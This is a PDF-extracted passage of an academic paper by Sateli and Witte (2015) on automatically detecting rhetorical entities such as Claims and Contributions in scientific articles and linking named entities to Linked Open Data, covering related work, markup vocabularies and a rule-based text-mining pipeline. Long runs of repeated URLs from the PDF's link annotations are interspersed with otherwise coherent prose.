http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://dx.doi.org/10.7717/peerj-cs.37 BACKGROUND Our work is based on three foundations: NLP techniques for rhetorical entity detection, named entity recognition in linked open data, and vocabularies for semantic markup of scientific documents. Rhetorical entities In the context of scientific literature, rhetorical entities (REs) are spans of text in a document (sentences, passages, sections, etc.), where authors convey their findings, like Claims or Arguments, to the readers. REs are usually situated in certain parts of a document, depending on their role. For example, the authors’ Claims are typically mentioned in the Abstract, Introduction or Conclusion section of a paper, and seldom in the Background. This conforms with the researchers’ habit in both reading and writing scientific articles. Indeed, according to a recent survey (Naak, Hage & Aimeur, 2008), researchers stated that they are interested in specific parts of an article when searching for literature, depending on their task at hand. Verbatim extraction of REs from text helps to efficiently allocate the attention of humans when reading a paper, as well as improving retrieval mechanisms by finding documents based on their REs (e.g., “Give me all papers with implementation details”). They can also help to narrow down the scope of subsequent knowledge extraction tasks by determining zones of text where further analysis is needed. Existing works in automatic RE extraction are mostly based on the Rhetorical Structure Theory (RST) (Mann & Thompson, 1988) that characterizes fragments of text and the relations that hold between them, such as contrast or circumstance. Marcu (1999) developed a rhetorical parser that derives the discourse structure from unrestricted text and uses a decision tree to extract Elementary Discourse Units (EDUs) from text. The work by Teufel (2010) identifies so-called Argumentative Zones (AZ) from scientific text as a group of sentences with the same rhetorical role. She uses statistical machine learning models and sentential features to extract AZs from a document. Teufel’s approach achieves a raw agreement of 71% with human annotations as the upper bound, using a Naı̈ve Bayes classifier. Applications of AZs include document management and automatic summarization tasks. In recent years, work on RE recognition has been largely limited to biomedical and chemical documents. Blake (2010) introduced the Claim Framework to differentiate levels of evidence, such as comparisons and observations, in implicit and explicit claims in biomedical domain literature. The HypothesisFinder (Malhotra et al., 2013) uses machine learning techniques to classify sentences in scientific literature in order to find speculative sentences. Combined with an ontology to find named entities in text, HypothesisFinder can establish hypothetical links between statements and their concepts in the given ontology. The JISC-funded ART project aimed at creating an “intelligent digital library,” where the explicit semantics of scientific papers is extracted and stored using an ontology-based annotation tool. The project produced SAPIENT (Semantic Annotation of Papers: Interface & ENrichment Tool; http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/), a Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 4/27 https://peerj.com/computer-science/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://dx.doi.org/10.7717/peerj-cs.37 web-based tool to help users annotate experiments in scientific papers with a set of General Specific Concepts (GSC) (Liakata & Soldatova, 2008). The development of SAPIENT was eventually succeeded by the SAPIENTA (SAPIENT Automation) tool (Liakata et al., 2012) that uses machine learning techniques to automatically annotate chemistry papers using the ART corpus as the training model. SAPIENTA’s machine learning approach has achieved an F-measure of 0.76, 0.62 and 0.53 on the automatic detection of Experiments, Background and Models (approaches) from chemistry papers, respectively. Document markup vocabularies An essential requirement for the semantic publishing process is the existence of controlled vocabularies that mandate the use of pre-defined terms to describe units of information with formalized, unambiguous meaning for machines. In scientific literature mining, controlled vocabularies are implemented in form of markup languages, like XML. Based on the chosen markup language, documents can be annotated for their structure and rhetorical elements, in either a manual or automatic fashion. Structural markup Prior to the analysis of scientific literature for their latent knowledge, we first need to provide the foundation for a common representation of documents, so that (i) the variations of their formats (e.g., HTML, PDF, LATEX) and publisher-specific markup can be converted to one unified structure; and (ii) various segments of a document required for further processing are explicitly marked up, e.g., by separating References from the document’s main matter. A notable example is SciXML (Rupp et al., 2006), which is an XML-based markup language for domain-independent research papers. It contains a set of vocabularies that separate a document into sections that may themselves contain references, footnotes, theorems and floats, like tables and figures. SciXML also provides a stand-off1 annotation format to represent various linguistic metadata of a given document, 1 In stand-off annotation style, the original text and its annotations are separated into two different parts and connected using text offsets. for example, for encoding chemical terms. The Open Annotation Model2 (OAM) (Sanderson et al., 2013) is an interoperable 2 Open Annotation Model, http://www. openannotation.org/spec/core/ framework aiming towards a common specification of an annotation schema for digital resources in RDF format. The focus of the OAM is on sharing annotations for scholarly purposes with a baseline model of only three classes: a Target being annotated, a Body of information about the target, and an Annotation class that describes the relationship between the body and target, all with de-referenceable URIs. Most of the existing annotation schemas, like SciXML, treat documents as semantically unrelated fragments of text, whereas in scientific literature this is obviously not the case: sections of a scientific article follow a logical, argumentative order (Teufel, 2010). Peroni (2012) has a similar observation and makes a distinction between XML-like languages for document markup on the one hand and semantic markup, like RDF, on the other hand. He argues that document markup languages leave the semantics of the content to the human interpretation and lack “expressiveness for the multiple and overlapping markup on the same text.” As a semantic solution, Di Iorio, Peroni & Vitali (2009) introduced the EARMARK markup metalanguage that models documents as collections of addressable text fragments Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 5/27 https://peerj.com/computer-science/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://dx.doi.org/10.7717/peerj-cs.37 and associates their content with OWL assertions to describe their structural and semantic properties. Similarly, Constantin et al. (in press) authored the DoCO3 ontology—as 3 The Document Components Ontology (DoCO), http://purl.org/spar/doco part of the SPAR (Semantic Publishing and Referencing) ontology family (http://www. sparontologies.net; Shotton et al., 2009)—that defines components of bibliographic documents, like figures and references, enabling their description in RDF format. Rhetorical entity markup In recent years, the Semantic Publishing community increasingly focused on developing vocabularies based on W3C standards, such as RDFS and OWL ontologies, for the semantic description of research publications. SALT (Groza et al., 2007a) is a framework for the semantic annotation of scientific literature. It comprises three ontologies: a Document Ontology that defines entities like text blocks, Abstract and Title; a Rhetorical Ontology4 that defines concepts like Claims, 4 SALT Rhetorical Ontology (SRO), http://lov.okfn.org/dataset/lov/ detailsvocabulary sro.html Explanations and Results; and an Annotation Ontology that provides the means to attach syntactic and semantic markup to the document. In the early versions of the SALT framework, the embedded semantic markup was extracted from the manuscript in the compilation phase and visualized in HTML pages generated from the document metadata. The SALT framework has been extended and adapted for extracting Claims from text with the ultimate goal of creating a knowledge network from scientific publications in the KonneXSALT system (Groza et al., 2008), which provides support for (manual) identification, referencing and querying of claims in a collection of documents. Groza et al. extended their Rhetorical Ontology with concepts, such as generalizations of claims and their related text chunks, to provide for identifying claims with possible multiple representations across a dataset. They also introduced a BibTeX-like referencing system (Groza et al., 2007b) for the citation of claims that can be incorporated into the LATEX environment using special commands, as well as queried using a web interface. CoreSC (Liakata et al., 2010) takes on a different approach of annotating scientific documents. It treats scientific literature as a human readable representation of scientific investigations and therefore, has a vocabulary that pertains to the structure of an investigation, like Experiment or Observation. CoreSC is itself a subpart of the EXPO ontology (Soldatova et al., 2006), a comprehensive vocabulary for defining scientific experiments, like Proposition or Substrate. While ontologies like SALT or AZ-II (Teufel, Siddharthan & Batchelor, 2009) focus on the rhetorical structure of a document, ontologies like CoreSC and EXPO are used for supporting reproducibility in various domains, like chemistry or the omics sciences. Named entity linking An active research area in the semantic web community is concerned with recognizing en- tities in text and linking them to the LOD cloud (Heath & Bizer, 2011). This task is related to, but different from named entity recognition (NER) as traditionally performed in NLP in two aspects: first, only entities described on the LOD are discovered (e.g., a city name not present on an LOD source would not be detected, even if an NLP method could identify it as such) and second, each entity must be linked to a unique URI on the LOD cloud. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 6/27 https://peerj.com/computer-science/ http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://dx.doi.org/10.7717/peerj-cs.37 A well-known tool for linked NE detection is DBpedia Spotlight (Mendes et al., 2011; Daiber et al., 2013), which automatically annotates text with DBpedia resource URIs. It compares surface forms of word tokens in a text to their mentions in the DBpedia ontology. After disambiguating the sense of a word, the tool creates a link to its corresponding concept in DBpedia. AIDA (Yosef et al., 2011) is an online tool that extracts and disambiguates NEs in a given text by calculating the prominence (frequency) and similarity of a mention to its related resources on the DBpedia, Freebase (https://www.freebase.com) and YAGO (http://www. mpi-inf.mpg.de/yago-naga/yago) ontologies. Usbeck et al. (2014) introduced AGDISTIS, a graph-based method that is independent of the underlying LOD source and can be applied to different languages. In their evaluation, it outperformed other existing tools on several datasets. More recently, Bontcheva et al. (2015) conducted a user study on how semantic enrichment of scientific articles can facilitate information discovery. They developed a text mining pipeline based on GATE that can process articles from the environmental science domain and link the entities in the documents to their DBpedia URI. Their goal, however, was to enrich the documents with additional metadata, such as geographical metadata, for a semantic search web service and automatically assigning a subject field to the documents from the Dublin Core (Weibel et al., 1998) ontology. Summary In our work, we follow an approach similar to Teufel’s in that we use NLP techniques for recognizing REs in scientific documents. However, rather than looking at documents in isolation, we aim at creating a linked data knowledge base from the documents, described with common Semantic Web vocabularies and interlinked with other LOD sources, such as DBpedia. We are not aware of existing work that combines NLP methods for RE detection with Semantic Web vocabularies in a fully-automated manner, especially in the computer science domain. Entity linking is a highly active research area in the Semantic Web community. However, it is typically applied on general, open domain content, such as news articles or blog posts, and none of the existing datasets used for evaluation contained scientific publications. To the best of our knowledge, our work is among the first to investigate the application of entity linking on scientific documents’ LOD entities combined with rhetorical entities. DESIGN In this section, we provide a step-by-step description of our approach towards a semantic representation of scientific literature. In our system, illustrated in Fig. 2, an automatic workflow accepts scientific literature (e.g., a journal article) as input, and processes the full-text of the document to detect various syntactic and semantic entities, such as bibliographical metadata and rhetorical entities (Section ‘Automatic detection of rhetorical entities’). In addition, our approach uses NER tools to detect the topics mentioned in the document content and link them to resources on the LOD cloud (Section ‘Automatic detection of named entities’). Finally, the extracted information is stored in a semantic Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 7/27 https://peerj.com/computer-science/ https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://dx.doi.org/10.7717/peerj-cs.37 Figure 2 A high-level overview of our workflow design, where a document is fed into an NLP pipeline that performs semantic analysis on its content and stores the extracted entities in a knowledge base, inter-linked with resources on the LOD cloud. knowledge base (Section ‘Semantic representation of entities’), which can then be queried by humans and machines alike for their tasks. Automatic detection of rhetorical entities We designed a text mining pipeline to automatically detect rhetorical entities in scientific literature, currently limited to Claims and Contributions. In our classification, Contributions are statements in a document that describe new scientific achievements attributed to its authors, such as introducing a new methodology. Claims, on the other hand, are statements by the authors that provide declarations on their contributions, such as claiming novelty or comparisons with other related works. Our RE detection pipeline extracts such statements on a sentential level, meaning that we look at individual sentences to classify them into one of three categories: Claim, Contribution, or neither. If a chunk of text (e.g., a paragraph or section) describes a Claim or Contribution, it will be extracted as multiple, separate sentences. In our approach, we classify a document’s sentences based on the existence of several discourse elements Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 8/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 and so-called trigger words. We adopted a rule-based approach, in which several rules are applied sequentially on a given sentence to match against its contained lexical and discourse elements. When a match is found, the rule then assigns a type, in form of a LOD URI, to the sentence under study. Text pre-processing As a prerequisite to the semantic analysis step, we pre-process a document’s text to covert it to a well-defined sequence of linguistically-meaningful units: words, numbers, symbols and sentences, which are passed along to the subsequent processing stages (Sateli & Witte, 2015). As part of this process, the document’s text is broken into tokens5 and lemmatized. 5 Tokens are smallest, meaningful units of text, such as words, numbers or symbols. Lemmatization is the process of finding the canonical form (lemma) of each word: e.g., “run,” “running” and “ran” all have the same root form (“run”). A Part-Of-Speech (POS) tagger then assigns a POS feature to each word token, such as noun, verb or adjective. Afterwards, determiners, adjectives and nouns are processed by a noun phrase (NP) chunker component, which groups them into NP annotations. Gazetteering Starting the semantic analysis phase, we perform gazetteering on the pre-processed text. Essentially, gazetteers are lists of known entities (words and phrases) that can be directly matched against the text. If a match is found, the word is tagged with its pre-defined type and later used in the rule-matching process. We manually curated multiple gazetteer lists that contain our trigger words. For example, we have gathered a list of general terms used in computer science (30 entries), such as “framework” and “approach,” as well as a comprehensive list of verbs used in the scientific argumentation context (160 entries), like “propose” and “develop,” categorized by their rhetorical functions in a text. We curated these gazetteer lists from manual inspection of the domain’s literature and Teufel’s AZ corpus (Argumentation Zoning (AZ) Corpus, http://www.cl.cam.ac.uk/∼sht25/AZ corpus.html) for rhetorical entities. In order to eliminate orthographical variations of words (e.g., plural vs. singular, past tense vs. present) the gazetteering is performed on the lemmatized text. This approach also dramatically reduces the size of the gazetteer lists, since they only need to keep the canonical form of each entry for matching against the text tokens. Metadiscourse phrases Detection of a rhetorical entity is performed in incremental steps: first, we detect metadiscourse elements in text, i.e., sentences where the authors describe what is being presented in the paper. Then, we classify each sentence under study based on a set of lexical and grammatical clues in the text. Metadiscourse entities often contain a discourse deixis. Deictic phrases are expressions within an utterance that refer to parts of the discourse. For example, the word “here” in “here, we describe a new methodology. . . ” refers to the article that the user is reading. In scientific literature, deictic phrases are often used in metadiscourse phrases, such as the following examples that look for a sequence of token categories (e.g., determiner) and entries from our gazetteer (deixes are in bold): Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 9/27 https://peerj.com/computer-science/ http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html 